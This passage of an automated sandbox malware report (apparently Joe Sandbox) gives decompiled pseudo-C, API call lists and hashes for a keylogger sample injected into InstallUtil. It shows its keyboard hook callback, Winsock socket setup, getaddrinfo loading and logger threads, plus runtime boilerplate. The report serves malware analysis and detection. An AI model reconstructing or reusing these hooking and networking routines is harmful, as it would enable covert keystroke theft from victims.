                                                                      • Opcode ID: 11d62433a0bf99988e24683bbf5812a75fdec783ca450b51d063bc476012dcbd
                                                                      • Instruction ID: 9a551bf274496a70fde5c61f4cb1b6a3b2706f8264e1f68fb6857697852ec5c6
                                                                      • Opcode Fuzzy Hash: 11d62433a0bf99988e24683bbf5812a75fdec783ca450b51d063bc476012dcbd
                                                                      • Instruction Fuzzy Hash: 6BF0A435A00209BACF08A7A6DC4ADFF776CDB85309B10407FB606B21D1EAB85D45C659
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			// Initializes the socket object at __ecx. __imp__#23 is ws2_32.dll ordinal 23, socket(): the address family is
                                                                      			// read from the structure at 0x46dacc, 1 = SOCK_STREAM, 6 = IPPROTO_TCP. The call is gated on a global flag at
                                                                      			// 0x46daab or a successful E00404875(). 0xffffffff is INVALID_SOCKET; 0x3e8 is a 1000 ms timeout; CreateEventW(0, 0, 1, 0)
                                                                      			// creates an auto-reset event that starts signaled. Fields are written twice (+0x68) as the decompiler rendered them.
                                                                      			E00404804(char* __ecx) {
                                                                      				intOrPtr _t14;
                                                                      				char _t16;
                                                                      				char* _t22;  // the socket object (this)
                                                                      
                                                                      				_t22 = __ecx;
                                                                      				if( *0x46daab != 0 || E00404875() != 0) {
                                                                      					_t14 =  *0x46dacc; // 0x0
                                                                      					__imp__#23( *((intOrPtr*)(_t14 + 4)), 1, 6); // executed: socket(af, SOCK_STREAM, IPPROTO_TCP)
                                                                      					 *((intOrPtr*)(_t22 + 4)) = _t14;
                                                                      					if(_t14 == 0xffffffff) { // INVALID_SOCKET
                                                                      						goto L2;
                                                                      					} else {
                                                                      						_t16 =  *0x46dad4; // 0x0
                                                                      						 *((char*)(_t22 + 0x5c)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x60)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8; // 1000 ms
                                                                      						 *((char*)(_t22 + 0x7d)) = 0;
                                                                      						 *((char*)(_t22 + 1)) = _t16;
                                                                      						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x50)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x68)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x70)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
                                                                      						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0); // auto-reset, initially signaled
                                                                      						 *_t22 = 1; // connected/initialized flag
                                                                      						return 1;
                                                                      					}
                                                                      				} else {
                                                                      					L2:
                                                                      					return 0;
                                                                      				}
                                                                      			}






                                                                      Addresses: 0x0040480c 0x0040480e 0x0040481d 0x00404829 0x0040482f 0x00404835 0x00000000 0x00404837 0x00404837 0x00404843 0x00404846 0x00404849 0x00404850 0x00404853 0x00404856 0x00404859 0x0040485c 0x0040485f 0x00404862 0x0040486b 0x00404870 0x00404874 0x00404874 0x00404819 0x00404819 0x0040481c 0x0040481c

                                                                      APIs
                                                                      • socket.WS2_32(?,00000001,00000006), ref: 00404829
                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,00000000,?,00405350,?,?,00000000,?,004052E2,?,Keylogger initialization failure: error ), ref: 00404865
                                                                        • Part of subcall function 00404875: WSAStartup.WS2_32(00000202,00000000), ref: 0040488A
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateEventStartupsocket
                                                                      • String ID:
                                                                      • API String ID: 1953588214-0
                                                                      • Opcode ID: 6b9e4f11f9d9a1ba16f3fe169b8234e6e02a1ff1852ce907c54f3e708a03f3c5
                                                                      • Instruction ID: 7b1813722303b8b163597c8ab081666278b13104996b4cc80dfd03e261cc98a6
                                                                      • Opcode Fuzzy Hash: 6b9e4f11f9d9a1ba16f3fe169b8234e6e02a1ff1852ce907c54f3e708a03f3c5
                                                                      • Instruction Fuzzy Hash: F501B1B18087809FD7349F29A8447867FE0AB55314F048E6FF1D697BA1D3B0A481CF18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0043F86B(void* __ebx, void* __ecx) {
                                                                      				void* _t2;
                                                                      				intOrPtr _t3;
                                                                      				signed int _t15;
                                                                      				signed int _t16;
                                                                      
                                                                      				if( *0x46d4d0 == 0) {
                                                                      					_push(_t15);
                                                                      					E0044AD49(__ecx); // executed
                                                                      					_t2 = E0044B0CB(); // executed
                                                                      					_t19 = _t2;
                                                                      					if(_t2 != 0) {
                                                                      						_t3 = E0043F918(__ebx, _t19);
                                                                      						if(_t3 != 0) {
                                                                      							 *0x46d4dc = _t3;
                                                                      							E00438431(0x46d4d0, _t3);
                                                                      							_t16 = 0;
                                                                      						} else {
                                                                      							_t16 = _t15 | 0xffffffff;
                                                                      						}
                                                                      						E004427C2(0);
                                                                      					} else {
                                                                      						_t16 = _t15 | 0xffffffff;
                                                                      					}
                                                                      					E004427C2(_t19);
                                                                      					return _t16;
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}







                                                                      Addresses: 0x0043f872 0x0043f878 0x0043f879 0x0043f87e 0x0043f883 0x0043f887 0x0043f88f 0x0043f897 0x0043f8a4 0x0043f8a9 0x0043f8ae 0x0043f899 0x0043f899 0x0043f899 0x0043f8b2 0x0043f889 0x0043f889 0x0043f889 0x0043f8b9 0x0043f8c3 0x0043f874 0x0043f876 0x0043f876

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: cd27336823bea05ba0d54b761362d8818fe01a616471ef142d915a0f2288e803
                                                                      • Instruction ID: ddba7f80a1c3860314320511434d058b5469eca7fc01f139c127d34023271ce3
                                                                      • Opcode Fuzzy Hash: cd27336823bea05ba0d54b761362d8818fe01a616471ef142d915a0f2288e803
                                                                      • Instruction Fuzzy Hash: 93E03922F4592121B22D323B6C06B6B05459F9937AF51123BF9218A1D1EFAC8C4A52AF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E0040161E(signed int _a4, signed int _a8, char _a12) {
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				void* __esi;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      				signed int _t62;
                                                                      				signed int _t71;
                                                                      				intOrPtr _t79;
                                                                      				signed int _t81;
                                                                      				signed int _t84;
                                                                      				signed int _t85;
                                                                      				signed int _t86;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t88;
                                                                      				signed int _t90;
                                                                      				intOrPtr _t91;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr _t98;
                                                                      				intOrPtr* _t100;
                                                                      				signed int _t101;
                                                                      				signed int _t102;
                                                                      				signed int _t104;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t120;
                                                                      				intOrPtr* _t122;
                                                                      				signed int _t123;
                                                                      				signed int _t125;
                                                                      				signed int _t126;
                                                                      				void* _t127;
                                                                      				void* _t133;
                                                                      				void* _t134;
                                                                      				void* _t137;
                                                                      				void* _t138;
                                                                      
                                                                      				_t101 = _a4;
                                                                      				if(_t101 != 0) {
                                                                      					_t60 = _t59 | 0xffffffff;
                                                                      					_t120 = _t60 % _a8;
                                                                      					__eflags = _t60 / _a8 - _t101;
                                                                      					if(_t60 / _a8 >= _t101) {
                                                                      						_t102 = _t101 * _a8;
                                                                      						__eflags = _a12;
                                                                      						if(__eflags == 0) {
                                                                      							L8:
                                                                      							_t62 = E00430E1B(_t120, _t127, __eflags, _t102); // executed
                                                                      							_t104 = _t62;
                                                                      							goto L9;
                                                                      						} else {
                                                                      							__eflags = _t102 - 0x1000;
                                                                      							if(__eflags < 0) {
                                                                      								goto L8;
                                                                      							} else {
                                                                      								_t64 = _t102 + 0x23;
                                                                      								__eflags = _t102 + 0x23 - _t102;
                                                                      								if(__eflags <= 0) {
                                                                      									goto L3;
                                                                      								} else {
                                                                      									_t91 = E00430E1B(_t120, _t127, __eflags, _t64);
                                                                      									_t11 = _t91 + 0x23; // 0x23
                                                                      									_t104 = _t11 & 0xffffffe0;
                                                                      									 *((intOrPtr*)(_t104 - 4)) = _t91;
                                                                      									L9:
                                                                      									return _t104;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t133 = _t137;
                                                                      						_t138 = _t137 - 0xc;
                                                                      						E0043150B( &_v16);
                                                                      						E00435A36( &_v16,  &E00468CEC);
                                                                      						asm("int3");
                                                                      						_push(_t133);
                                                                      						_t134 = _t138;
                                                                      						E0043153E( &_v32);
                                                                      						E00435A36( &_v32, 0x468d24);
                                                                      						asm("int3");
                                                                      						_push(_t134);
                                                                      						 *0x46cd0c =  *0x46cd0c & 0x00000000;
                                                                      						 *0x46c010 =  *0x46c010 | 1;
                                                                      						_t71 = IsProcessorFeaturePresent(0xa);
                                                                      						__eflags = _t71;
                                                                      						if(_t71 != 0) {
                                                                      							_v28 = _v28 & 0x00000000;
                                                                      							 *0x46c010 =  *0x46c010 | 0x00000002;
                                                                      							_push(_t127);
                                                                      							 *0x46cd0c = 1;
                                                                      							_t122 =  &_v52;
                                                                      							_push(1);
                                                                      							asm("cpuid");
                                                                      							_pop(_t97);
                                                                      							 *_t122 = 0;
                                                                      							 *((intOrPtr*)(_t122 + 4)) = 1;
                                                                      							 *((intOrPtr*)(_t122 + 8)) = 0;
                                                                      							 *(_t122 + 0xc) = _t120;
                                                                      							_v20 = _v52;
                                                                      							__eflags = _v40 ^ 0x49656e69 | _v44 ^ 0x6c65746e | _v48 ^ 0x756e6547;
                                                                      							_t79 = 1;
                                                                      							_t112 = 0;
                                                                      							_push(1);
                                                                      							asm("cpuid");
                                                                      							_pop(_t98);
                                                                      							 *_t122 = _t79;
                                                                      							 *((intOrPtr*)(_t122 + 4)) = _t97;
                                                                      							 *((intOrPtr*)(_t122 + 8)) = _t112;
                                                                      							 *(_t122 + 0xc) = _t120;
                                                                      							if((_v40 ^ 0x49656e69 | _v44 ^ 0x6c65746e | _v48 ^ 0x756e6547) != 0) {
                                                                      								L21:
                                                                      								_t123 =  *0x46cd10; // 0x2
                                                                      							} else {
                                                                      								_t90 = _v52 & 0x0fff3ff0;
                                                                      								__eflags = _t90 - 0x106c0;
                                                                      								if(_t90 == 0x106c0) {
                                                                      									L20:
                                                                      									_t126 =  *0x46cd10; // 0x2
                                                                      									_t123 = _t126 | 0x00000001;
                                                                      									 *0x46cd10 = _t123;
                                                                      								} else {
                                                                      									__eflags = _t90 - 0x20660;
                                                                      									if(_t90 == 0x20660) {
                                                                      										goto L20;
                                                                      									} else {
                                                                      										__eflags = _t90 - 0x20670;
                                                                      										if(_t90 == 0x20670) {
                                                                      											goto L20;
                                                                      										} else {
                                                                      											__eflags = _t90 - 0x30650;
                                                                      											if(_t90 == 0x30650) {
                                                                      												goto L20;
                                                                      											} else {
                                                                      												__eflags = _t90 - 0x30660;
                                                                      												if(_t90 == 0x30660) {
                                                                      													goto L20;
                                                                      												} else {
                                                                      													__eflags = _t90 - 0x30670;
                                                                      													if(_t90 != 0x30670) {
                                                                      														goto L21;
                                                                      													} else {
                                                                      														goto L20;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							__eflags = _v20 - 7;
                                                                      							_v36 = _v40;
                                                                      							_t81 = _v44;
                                                                      							_v16 = _t81;
                                                                      							_v32 = _t81;
                                                                      							if(_v20 >= 7) {
                                                                      								_t87 = 7;
                                                                      								_push(_t98);
                                                                      								asm("cpuid");
                                                                      								_t100 =  &_v52;
                                                                      								 *_t100 = _t87;
                                                                      								 *((intOrPtr*)(_t100 + 4)) = _t98;
                                                                      								 *((intOrPtr*)(_t100 + 8)) = 0;
                                                                      								 *(_t100 + 0xc) = _t120;
                                                                      								_t88 = _v48;
                                                                      								__eflags = _t88 & 0x00000200;
                                                                      								_v28 = _t88;
                                                                      								_t81 = _v16;
                                                                      								if((_t88 & 0x00000200) != 0) {
                                                                      									_t125 = _t123 | 0x00000002;
                                                                      									__eflags = _t125;
                                                                      									 *0x46cd10 = _t125;
                                                                      								}
                                                                      							}
                                                                      							__eflags = _t81 & 0x00100000;
                                                                      							if((_t81 & 0x00100000) != 0) {
                                                                      								 *0x46c010 =  *0x46c010 | 0x00000004;
                                                                      								 *0x46cd0c = 2;
                                                                      								__eflags = _t81 & 0x08000000;
                                                                      								if((_t81 & 0x08000000) != 0) {
                                                                      									__eflags = _t81 & 0x10000000;
                                                                      									if((_t81 & 0x10000000) != 0) {
                                                                      										asm("xgetbv");
                                                                      										_v24 = _t81;
                                                                      										_v20 = _t120;
                                                                      										__eflags = (_v24 & 0x00000006) - 6;
                                                                      										if((_v24 & 0x00000006) == 6) {
                                                                      											__eflags = 0;
                                                                      											if(0 == 0) {
                                                                      												_t84 =  *0x46c010; // 0x2f
                                                                      												_t85 = _t84 | 0x00000008;
                                                                      												 *0x46cd0c = 3;
                                                                      												__eflags = _v28 & 0x00000020;
                                                                      												 *0x46c010 = _t85;
                                                                      												if((_v28 & 0x00000020) != 0) {
                                                                      													_t86 = _t85 | 0x00000020;
                                                                      													__eflags = _t86;
                                                                      													 *0x46cd0c = 5;
                                                                      													 *0x46c010 = _t86;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      					}
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5253ddd10c1c34c0a749f43adec96a1d39af4a7794a61d16a0385bbc4e38a8e
                                                                      • Instruction ID: 62c3818e98da017e1fca948137a6df447d2c96562f3af687e90aa36426572ec8
                                                                      • Opcode Fuzzy Hash: b5253ddd10c1c34c0a749f43adec96a1d39af4a7794a61d16a0385bbc4e38a8e
                                                                      • Instruction Fuzzy Hash: 82F082702052016ACB1C8734CD65B2A76954B85355F249F3FF06BD61E1D73ACD96C60D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E004124C2(void* __ecx, void* __edx) {
                                                                      				intOrPtr* _t1;
                                                                      				void* _t2;
                                                                      				void* _t6;
                                                                      				void* _t7;
                                                                      				void* _t8;
                                                                      
                                                                      				_t1 =  *0x46fdc0;
                                                                      				_t7 = __edx;
                                                                      				_t6 = __ecx;
                                                                      				if(_t1 == 0) {
                                                                      					_t1 = E0041235F();
                                                                      					 *0x46fdc0 = _t1;
                                                                      				}
                                                                      				_t2 =  *_t1(_t6, _t7, 0, 0x46dacc); // executed
                                                                      				_t8 = _t2;
                                                                      				__imp__#112(_t8);
                                                                      				return _t8;
                                                                      			}

                                                                      APIs
                                                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,0046DACC,0046E600,00000000,00412761,00000000,00000001), ref: 004124E4
                                                                      • WSASetLastError.WS2_32(00000000), ref: 004124E9
                                                                        • Part of subcall function 0041235F: GetSystemDirectoryA.KERNEL32 ref: 004123AE
                                                                        • Part of subcall function 0041235F: LoadLibraryA.KERNEL32(?), ref: 004123F0
                                                                        • Part of subcall function 0041235F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412410
                                                                        • Part of subcall function 0041235F: FreeLibrary.KERNEL32(00000000), ref: 00412417
                                                                        • Part of subcall function 0041235F: LoadLibraryA.KERNEL32(?), ref: 0041244F
                                                                        • Part of subcall function 0041235F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412461
                                                                        • Part of subcall function 0041235F: FreeLibrary.KERNEL32(00000000), ref: 00412468
                                                                        • Part of subcall function 0041235F: GetProcAddress.KERNEL32(00000000,?), ref: 00412477
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 1170566393-0
                                                                      • Opcode ID: e9d8b26983078d7839e2644e854225252bff1ecd1ec221a198454c4b0a4a66a5
                                                                      • Instruction ID: 6d644d45d32815caf5efc1f8d7381c6379b5bc5e2a8c879a2a639a0c61cb5c63
                                                                      • Opcode Fuzzy Hash: e9d8b26983078d7839e2644e854225252bff1ecd1ec221a198454c4b0a4a66a5
                                                                      • Instruction Fuzzy Hash: 97D012726001216B9310A769AC04BFB669CEBD66657050037F414D3111F6D45C5142A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00408651(void* __ebx, void* __edi, void* __eflags, char _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      				void* _t36;
                                                                      				void* _t72;
                                                                      				void* _t75;
                                                                      				void* _t76;
                                                                      				void* _t77;
                                                                      
                                                                      				_t47 = __ebx;
                                                                      				_t77 = _t76 - 0x4c;
                                                                      				 *0x46c9c4 = _a4;
                                                                      				_push(_t72);
                                                                      				E00401F46(__ebx,  &_v28);
                                                                      				_t24 = E00438416(_a12);
                                                                      				_t69 = _a8;
                                                                      				if(_t24 != 0) {
                                                                      					_t25 = E0041905E( &_v52, _t69, _a12); // executed
                                                                      					E00401ED3(0x46e420, _t69, 0x46e420, _t25);
                                                                      					E00401EC9();
                                                                      					_t69 = E004078F9( &_v76, 0x46e420, _t75, "\\");
                                                                      					E00401ED3( &_v28, _t28, 0x46e420, E00402FD4(__ebx,  &_v52, _t28, __edi, _t75, __eflags, _a16));
                                                                      					E00401EC9();
                                                                      				} else {
                                                                      					E00401ED3( &_v28, _t69, _t72, E0041905E( &_v52, _t69, _a16));
                                                                      				}
                                                                      				E00401EC9();
                                                                      				 *0x46e454 =  *0x46e454 & 0x00000000;
                                                                      				 *0x46e450 = _a20 * 0x3e8;
                                                                      				 *0x46e3f3 = _a24;
                                                                      				_t36 =  *0x46c9c4 - 0x31;
                                                                      				if(_t36 == 0) {
                                                                      					E0040773A(_t47, _t77 - 0x18, _t69, __eflags,  &_v28);
                                                                      					E00408935(0x46e3a8, _t69); // executed
                                                                      				} else {
                                                                      					_t83 = _t36 == 1;
                                                                      					if(_t36 == 1) {
                                                                      						E0040773A(_t47, _t77 - 0x18, _t69, _t83,  &_v28);
                                                                      						E004089EC(0x46e3a8);
                                                                      					}
                                                                      				}
                                                                      				return E00401EC9();
                                                                      			}

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 0040866B
                                                                        • Part of subcall function 00408935: CreateThread.KERNELBASE(00000000,00000000,00408A37,?,00000000,00000000), ref: 004089BD
                                                                        • Part of subcall function 00408935: CreateThread.KERNELBASE(00000000,00000000,Function_00008A21,?,00000000,00000000), ref: 004089CD
                                                                        • Part of subcall function 00408935: CreateThread.KERNELBASE(00000000,00000000,Function_00008A43,?,00000000,00000000), ref: 004089D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 1119755333-0
                                                                      • Opcode ID: ac323117cbdf0563bfcb29240a8b004708b4cfa17b4c3b8b3985ce47f125244b
                                                                      • Instruction ID: 7c739b3e14c6aaae9f1388b9b253f3f0d8d515182886c5f67db4714b133ee797
                                                                      • Opcode Fuzzy Hash: ac323117cbdf0563bfcb29240a8b004708b4cfa17b4c3b8b3985ce47f125244b
                                                                      • Instruction Fuzzy Hash: D62193758141495ACB05FF76ED628FE7BB8AF10308F10403FF841732E2EE386945869A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00408B21(int __edx, int _a4, void* _a8) {
                                                                      				void* __ebx;
                                                                      				void* __ecx;
                                                                      				void* __ebp;
                                                                      				void* _t10;
                                                                      				void* _t14;
                                                                      				struct HHOOK__** _t19;
                                                                      				signed int _t20;
                                                                      				int _t31;
                                                                      
                                                                      				_t26 = __edx;
                                                                      				_t19 =  *0x46dae8; // 0x46e3a8
                                                                      				_t31 = __edx;
                                                                      				_t2 =  &(_t19[0x13]); // 0x46e3f4
                                                                      				_t20 = 5;
                                                                      				memcpy(_t2, _a8, _t20 << 2);
                                                                      				if(_t31 == 0) {
                                                                      					_t10 = _a4 - 0x100;
                                                                      					if(_t10 == 0) {
                                                                      						E00409D74(_t19);
                                                                      						if(E004098AF(_t19, _t19) == 0) {
                                                                      							E00409B7B(_t19, _t19, _t26); // executed
                                                                      						}
                                                                      					} else {
                                                                      						_t14 = _t10 - 1;
                                                                      						if(_t14 == 0) {
                                                                      							E00409D88(_t19);
                                                                      							E00409D2E(_t19, _t19);
                                                                      						} else {
                                                                      							if(_t14 == 3) {
                                                                      								E00409CD4(_t19, _t19, _t26);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return CallNextHookEx( *_t19, _t31, _a4, _a8);
                                                                      			}

                                                                      APIs
                                                                      • CallNextHookEx.USER32 ref: 00408B8C
                                                                        • Part of subcall function 00409CD4: GetKeyState.USER32(00000011), ref: 00409CD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CallHookNextState
                                                                      • String ID:
                                                                      • API String ID: 3280314413-0
                                                                      • Opcode ID: 9e25466f24c74d7198f88964cf7fa652263210040eeb58fd821b66de32517e40
                                                                      • Instruction ID: 0bfc7fbe7ec38a0f543e81c1e979400371ef823df0c219fcd9bb6f72e4d5308b
                                                                      • Opcode Fuzzy Hash: 9e25466f24c74d7198f88964cf7fa652263210040eeb58fd821b66de32517e40
                                                                      • Instruction Fuzzy Hash: 5EF026B26042088BCA047E799D4182B7765EFD0324F00043FFD82662D3CE39AC059359
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E004421F7(void* __ecx, long _a4) {
                                                                      				void* __esi;
                                                                      				void* _t4;
                                                                      				void* _t6;
                                                                      				void* _t7;
                                                                      				long _t8;
                                                                      
                                                                      				_t7 = __ecx;
                                                                      				_t8 = _a4;
                                                                      				if(_t8 > 0xffffffe0) {
                                                                      					L7:
                                                                      					 *((intOrPtr*)(E00439941())) = 0xc;
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				if(_t8 == 0) {
                                                                      					_t8 = _t8 + 1;
                                                                      				}
                                                                      				while(1) {
                                                                      					_t4 = RtlAllocateHeap( *0x46da4c, 0, _t8); // executed
                                                                      					if(_t4 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = E00441605();
                                                                      					if(__eflags == 0) {
                                                                      						goto L7;
                                                                      					}
                                                                      					_t6 = E0043F040(_t7, _t8, __eflags, _t8);
                                                                      					_pop(_t7);
                                                                      					__eflags = _t6;
                                                                      					if(_t6 == 0) {
                                                                      						goto L7;
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 7c571a3b0239bc88ac616669ac918d5d3baa0a1dddb41d42e6ba6a31e426335f
                                                                      • Instruction ID: 8f966932ec339c1ad80b894952239f269ffdb0563d311d850b1746e36c8e53a8
                                                                      • Opcode Fuzzy Hash: 7c571a3b0239bc88ac616669ac918d5d3baa0a1dddb41d42e6ba6a31e426335f
                                                                      • Instruction Fuzzy Hash: 84E0E52150522257F6212A66AE0575B7A48BF5A3F0F6501A7FC0896291DEECCD1081AE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAStartup.WS2_32(00000202,00000000), ref: 0040488A
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      • Opcode ID: 5a5bcd61a2a750b2626bb476a6100c07c37620ca65ab93537e366a0bec14f4a4
                                                                      • Instruction ID: bde307b9e9911254b3c92d87092e3ab444a03bdd01bd17ab307d4b39b127da09
                                                                      • Opcode Fuzzy Hash: 5a5bcd61a2a750b2626bb476a6100c07c37620ca65ab93537e366a0bec14f4a4
                                                                      • Instruction Fuzzy Hash: FDD0123299C60C4ED610BAB4AC0F9B5775CD313619F0403BAACB5835D3F640572CC2AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00406571(short* __edx, void* __eflags, intOrPtr _a4) {
                                                                      				char _v132;
                                                                      				char _v136;
                                                                      				char _v152;
                                                                      				char _v160;
                                                                      				char _v168;
                                                                      				char _v176;
                                                                      				char _v180;
                                                                      				char _v184;
                                                                      				void* _v200;
                                                                      				char _v204;
                                                                      				char _v216;
                                                                      				char _v224;
                                                                      				char _v228;
                                                                      				char _v232;
                                                                      				void* _v236;
                                                                      				char _v240;
                                                                      				char _v248;
                                                                      				char _v252;
                                                                      				char _v256;
                                                                      				char _v260;
                                                                      				char _v264;
                                                                      				void* _v272;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				char _v284;
                                                                      				char _v288;
                                                                      				char _v292;
                                                                      				char _v296;
                                                                      				char _v300;
                                                                      				char _v304;
                                                                      				char _v308;
                                                                      				char _v312;
                                                                      				void* _v324;
                                                                      				void* _v332;
                                                                      				char _v336;
                                                                      				char _v348;
                                                                      				char _v356;
                                                                      				char _v360;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t158;
                                                                      				signed int _t160;
                                                                      				void* _t179;
                                                                      				int _t190;
                                                                      				void* _t194;
                                                                      				void* _t198;
                                                                      				signed char _t210;
                                                                      				signed int _t212;
                                                                      				void* _t216;
                                                                      				void* _t221;
                                                                      				signed int _t222;
                                                                      				void* _t231;
                                                                      				short* _t237;
                                                                      				void* _t238;
                                                                      				void* _t249;
                                                                      				void* _t266;
                                                                      				void* _t276;
                                                                      				void* _t293;
                                                                      				void* _t294;
                                                                      				void* _t307;
                                                                      				void* _t314;
                                                                      				void* _t318;
                                                                      				void* _t319;
                                                                      				void* _t323;
                                                                      				void* _t334;
                                                                      				void* _t342;
                                                                      				void* _t426;
                                                                      				void* _t429;
                                                                      				short* _t553;
                                                                      				intOrPtr _t560;
                                                                      				intOrPtr _t561;
                                                                      				signed int _t562;
                                                                      				signed int _t565;
                                                                      				signed int _t566;
                                                                      				signed int _t568;
                                                                      				void* _t570;
                                                                      				void* _t572;
                                                                      				void* _t574;
                                                                      				void* _t575;
                                                                      				void* _t576;
                                                                      				void* _t580;
                                                                      				signed int _t581;
                                                                      				void* _t584;
                                                                      				void* _t585;
                                                                      				void* _t586;
                                                                      				void* _t592;
                                                                      				void* _t593;
                                                                      				void* _t594;
                                                                      				void* _t595;
                                                                      				void* _t597;
                                                                      				void* _t598;
